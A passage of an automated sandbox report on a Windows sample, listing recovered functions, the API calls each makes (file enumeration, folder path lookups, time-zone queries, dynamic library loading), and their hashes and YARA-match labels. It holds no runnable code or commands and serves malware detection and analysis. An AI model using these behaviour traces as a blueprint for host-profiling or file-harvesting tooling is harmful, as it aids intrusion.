                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrcpywsprintf
                                            • String ID: %dx%d
                                            • API String ID: 2716131235-2206825331
                                            • Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                            • Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
                                            • Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                            • Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5
                                            APIs
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0246F27A
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0246F293
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Value___vcrt_
                                            • String ID:
                                            • API String ID: 1426506684-0
                                            • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                            • Instruction ID: 082da04b695669eaf4f1f8f473911a0aaa127cfbb2537448688c93a72fa7f4a7
                                            • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                            • Instruction Fuzzy Hash: 680128362096219EFA2416767CC8FBB2755FB016B4B35433FE12B895E0EF5248054DC1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcessstrtok_s
                                            • String ID:
                                            • API String ID: 3407564107-0
                                            • Opcode ID: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                            • Instruction ID: 9be7034a28056e97878b4cf8fa5355d98f4919b78a7d7e4895a7b2dbd2163216
                                            • Opcode Fuzzy Hash: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                            • Instruction Fuzzy Hash: 02112B74D00209EFCB04DFA5D984AEDBB75FF44309F10806AE91966290E7705B85CF95
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                            • wsprintfA.USER32 ref: 00417B83
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocLocalProcessTimewsprintf
                                            • String ID:
                                            • API String ID: 1243822799-0
                                            • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
                                            • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 02407DA7
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02407DAE
                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 02407DBB
                                            • wsprintfA.USER32 ref: 02407DEA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                                            • String ID:
                                            • API String ID: 377395780-0
                                            • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction ID: 2edc6ab0acc38d5d1ed56217d907d55b8e8445786e24612b2299e24c0b0d1b6f
                                            • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction Fuzzy Hash: B8112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E2395940C7B5
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 02407E5A
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02407E61
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 02407E74
                                            • wsprintfA.USER32 ref: 02407EAE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                            • String ID:
                                            • API String ID: 3317088062-0
                                            • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction ID: a1729273c1db532a2f516d805bb92df6524e206831df9639a342ce7891303090
                                            • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction Fuzzy Hash: F311A5B1D06218DBD7108B54DC45FA9B778FB05711F1043E6F519A72C0D7746E80CB95
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s
                                            • String ID:
                                            • API String ID: 3330995566-0
                                            • Opcode ID: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                            • Instruction ID: eb2ca669fe8dab4b4e9353132e6c8991ff5de2450072f0cce4cc633b8b4886ea
                                            • Opcode Fuzzy Hash: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                            • Instruction Fuzzy Hash: 97111870E002099FDB14DFAAD988BEEBFB9EF44308F0080AAE515AA291D7749541CF55
                                            APIs
                                            • CreateFileA.KERNEL32(02403FA5,80000000,00000003,00000000,00000003,00000080,00000000,?,02403FA5,?), ref: 024096F3
                                            • GetFileSizeEx.KERNEL32(000000FF,02403FA5), ref: 02409710
                                            • CloseHandle.KERNEL32(000000FF), ref: 0240971E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSize
                                            • String ID:
                                            • API String ID: 1378416451-0
                                            • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction ID: 6b7e1b1763b9fca7a81b9b84e4cf10fa95ed22a30a89f62cf53c94c433c35024
                                            • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction Fuzzy Hash: 3FF0623AE14208FBDB14DFB0DC89F9E77BAAB48700F10C665FA51A72C0E630A641CB41
                                            APIs
                                            • LoadLibraryA.KERNEL32(004212DC), ref: 023FA2FF
                                            • GetProcAddress.KERNEL32(006D70A8,004212F8), ref: 023FA325
                                            • GetProcAddress.KERNEL32(006D70A8,00421310), ref: 023FA33C
                                            • FreeLibrary.KERNEL32(006D70A8), ref: 023FA360
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressLibraryProc$FreeLoad
                                            • String ID:
                                            • API String ID: 2256533930-0
                                            • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                            • Instruction ID: 882c8ac737475a85607ce3c8175cd0d2981072378b163cafc3c4ed069844f37c
                                            • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                            • Instruction Fuzzy Hash: CBF0F9B8E0A224EFD7419B65FD48B5537A6F308701F506527F609872E0E3B49484CB26
                                            APIs
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02406FD1
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02406FEF
                                            • CloseHandle.KERNEL32(00000000), ref: 02407000
                                            • Sleep.KERNEL32(00001770), ref: 0240700B
                                            • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02407021
                                            • ExitProcess.KERNEL32 ref: 02407029
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                            • String ID:
                                            • API String ID: 941982115-0
                                            • Opcode ID: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                            • Instruction ID: bf4cb9160f76a103d7199ecddd2b1c969e789d6b3fa8a97bd063129f0d1edcf4
                                            • Opcode Fuzzy Hash: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                            • Instruction Fuzzy Hash: 00F05E7094821AAAE720ABA0DC84F7EB77AFB44745F100A3BB513A11D0DBB055C0CE62
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0246EE8E
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0246EF42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                            • Instruction ID: 43a8aa8f6bc5cd7788dfefd2ee9997a4355e4453e5f4478caaa75cca7324ec34
                                            • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                            • Instruction Fuzzy Hash: 0C418138A00218EFCF14DFA9C888EEEBBE6AF45314F14815AE9195B391D7319915CF92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Catch
                                            • String ID: MOC$RCC
                                            • API String ID: 78271584-2084237596
                                            • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                            • Instruction ID: 96c9e4d7570e26a7ff4a927b066cfaca83dd2bd0694842a2890b9506a40144d3
                                            • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                            • Instruction Fuzzy Hash: 18417B31900109AFCF15CF98DD84AFE7BB5FF48308F16805AE94666221D736A954CF52
                                            APIs
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
                                            • lstrcatA.KERNEL32(?,00A70910), ref: 004152F8
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                              • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                            • String ID: 9dA
                                            • API String ID: 2699682494-3568425128
                                            • Opcode ID: d32059b2d27a57a75968c31ec2e6e01f0f2f25f3199ea4b8717440e2c91f7b81
                                            • Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
                                            • Opcode Fuzzy Hash: d32059b2d27a57a75968c31ec2e6e01f0f2f25f3199ea4b8717440e2c91f7b81
                                            • Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D
                                              • Part of subcall function 023FA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 023FA7E4
                                            • lstrlen.KERNEL32(00000000), ref: 023FBED6
                                              • Part of subcall function 02409227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02409249
                                            • StrStrA.SHLWAPI(00000000,0042143C), ref: 023FBF04
                                            • lstrlen.KERNEL32(00000000), ref: 023FBFDC
                                            • lstrlen.KERNEL32(00000000), ref: 023FBFF0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                            • String ID:
                                            • API String ID: 1440504306-0
                                            • Opcode ID: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                            • Instruction ID: 8d947cd288520c0fd42f25d8f25c18da55a190e4474b7c9f94950a73a9451ae8
                                            • Opcode Fuzzy Hash: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                            • Instruction Fuzzy Hash: C3B103729103289BCB18FBA1DC95EEE733AAF54305F50457EE606661D0EF346A88CF61
                                            APIs
                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                            • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                            • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                            • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$CloseFileNextlstrcat
                                            • String ID: q?A
                                            • API String ID: 3840410801-4084695119
                                            • Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                            • Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
                                            • Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                            • Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55
                                            APIs
                                              • Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202
                                            • lstrcat.KERNEL32(?,00000000), ref: 02405431
                                            • lstrcat.KERNEL32(?,00421058), ref: 0240544E
                                            • lstrcat.KERNEL32(?,006D6FF8), ref: 02405462
                                            • lstrcat.KERNEL32(?,0042105C), ref: 02405474
                                              • Part of subcall function 02404DC7: wsprintfA.USER32 ref: 02404DE3
                                              • Part of subcall function 02404DC7: FindFirstFileA.KERNEL32(?,?), ref: 02404DFA
                                              • Part of subcall function 02404DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 02404E28
                                              • Part of subcall function 02404DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 02404E3E
                                              • Part of subcall function 02404DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 02405034
                                              • Part of subcall function 02404DC7: FindClose.KERNEL32(000000FF), ref: 02405049
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                            • String ID:
                                            • API String ID: 2667927680-0
                                            • Opcode ID: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                            • Instruction ID: 46427301e8dbd6899262a71b58c5d5600c042761b264786e1791bb2d187c4ec3
                                            • Opcode Fuzzy Hash: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                            • Instruction Fuzzy Hash: 9921C876D00218A7CB14EB70EC85EE9333EAF54300F40465AF699561D0EE745BCC8F91